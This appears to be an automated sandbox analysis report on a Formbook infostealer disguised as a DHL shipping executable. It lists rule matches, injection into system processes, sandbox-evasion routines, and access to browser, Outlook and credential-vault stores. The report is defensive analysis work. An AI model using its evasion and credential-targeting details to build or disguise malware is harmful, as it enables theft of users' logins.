Source: 00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/7

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_002137B5 GetLastError,FormatMessageW,

0_2_002137B5

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_002010BF AdjustTokenPrivileges,CloseHandle,		0_2_002010BF
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_002016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_002016C3

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_002151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002151CD

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0022A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0022A67C

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0021648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0021648E

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001A42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001A42A2

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

File created: C:\Users\user\AppData\Local\Temp\trickstress

Jump to behavior

Source: DHL 8350232025-1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000002.3911989636.0000000002B4E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3911989636.0000000002B2C000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3911989636.0000000002B21000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1787845489.0000000002B21000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1787727601.0000000002B01000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL 8350232025-1.exe	Virustotal: Detection: 29%
Source: DHL 8350232025-1.exe	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\DHL 8350232025-1.exe "C:\Users\user\Desktop\DHL 8350232025-1.exe"
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 8350232025-1.exe"
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 8350232025-1.exe"	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL 8350232025-1.exe

Static file information: File size 1563648 > 1048576

Source: DHL 8350232025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DHL 8350232025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DHL 8350232025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DHL 8350232025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DHL 8350232025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DHL 8350232025-1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DHL 8350232025-1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000000.1524678482.000000000032E000.00000002.00000001.01000000.00000004.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3911204797.000000000032E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL 8350232025-1.exe, 00000000.00000003.1450362900.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, DHL 8350232025-1.exe, 00000000.00000003.1448312981.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603289868.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508657535.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603289868.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1510396331.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1606858103.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3913704213.0000000003060000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3913704213.00000000031FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1603263142.0000000002D0A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL 8350232025-1.exe, 00000000.00000003.1450362900.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, DHL 8350232025-1.exe, 00000000.00000003.1448312981.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1603289868.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508657535.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603289868.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1510396331.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1606858103.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3913704213.0000000003060000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3913704213.00000000031FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1603263142.0000000002D0A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1572046681.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603041914.0000000003400000.00000004.00000020.00020000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000003.1544188752.000000000131B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3911989636.0000000002A9E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3914997202.000000000368C000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000000.1673844069.000000000347C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1895418867.000000002C87C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3911989636.0000000002A9E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3914997202.000000000368C000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000000.1673844069.000000000347C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1895418867.000000002C87C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1572046681.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603041914.0000000003400000.00000004.00000020.00020000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000003.1544188752.000000000131B000.00000004.00000001.00020000.00000000.sdmp

Source: DHL 8350232025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DHL 8350232025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DHL 8350232025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DHL 8350232025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DHL 8350232025-1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001A42DE

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C0A76 push ecx; ret	0_2_001C0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004048A9 push esp; ret	2_2_004048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E2BA push 00000038h; iretd	2_2_0041E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A436 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C92 pushad ; retf	2_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A5D9 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004017E5 push ebp; retf 003Fh	2_2_004017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403780 push eax; ret	2_2_00403782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004147A2 push es; iretd	2_2_004147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx	2_2_03B309B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0306225F pushad ; ret	4_2_030627F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030627FA pushad ; ret	4_2_030627F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030909AD push ecx; mov dword ptr [esp], ecx	4_2_030909B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0306283D push eax; iretd	4_2_03062858
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03061368 push eax; iretd	4_2_03061369
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02552238 pushad ; iretd	4_2_02552239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0255AB37 push 00000038h; iretd	4_2_0255AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02556E56 push ebx; iretd	4_2_02556E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02550EAB push ebp; retf	4_2_02550EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02556CB3 push ebx; iretd	4_2_02556E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0255101F push es; iretd	4_2_02551027
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02541126 push esp; ret	4_2_02541127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0255D1B0 push es; ret	4_2_0255D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0255550F pushad ; retf	4_2_02555510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0255FEF5 push FFFFFFBAh; ret	4_2_0255FEF7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0254FFA0 push esi; iretd	4_2_0254FFA5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DA429A push cs; retf	4_2_02DA42F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DA4268 push cs; retf	4_2_02DA42F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DA03DA push ebx; ret	4_2_02DA042C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DAD620 push esi; ret	4_2_02DAD63B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DA47F5 push es; ret	4_2_02DA47FA

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001BF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_001BF98E
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00231C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00231C41

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-99526

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	API/Special instruction interceptor: Address: 1388174
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03B7096E rdtsc

2_2_03B7096E

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9833

Jump to behavior

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4004	Thread sleep count: 140 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4004	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4004	Thread sleep count: 9833 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4004	Thread sleep time: -19666000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe TID: 6372	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe TID: 6372	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001DC2A2 FindFirstFileExW,	0_2_001DC2A2
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_002168EE FindFirstFileW,FindClose,	0_2_002168EE
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0021698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0021698F
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0020D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0020D076
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0020D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0020D3A9
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00219642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00219642
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0021979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0021979D
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00219B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00219B2B
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0020DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0020DBBE
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00215C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00215C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0255BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0255BAB0

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001A42DE

Source: F56GKLK7U4.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: F56GKLK7U4.4.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: netbtugc.exe, 00000004.00000002.3916963551.0000000007A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696494690n
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: netbtugc.exe, 00000004.00000002.3916963551.0000000007A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,116P-
Source: netbtugc.exe, 00000004.00000002.3916963551.0000000007A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696494690
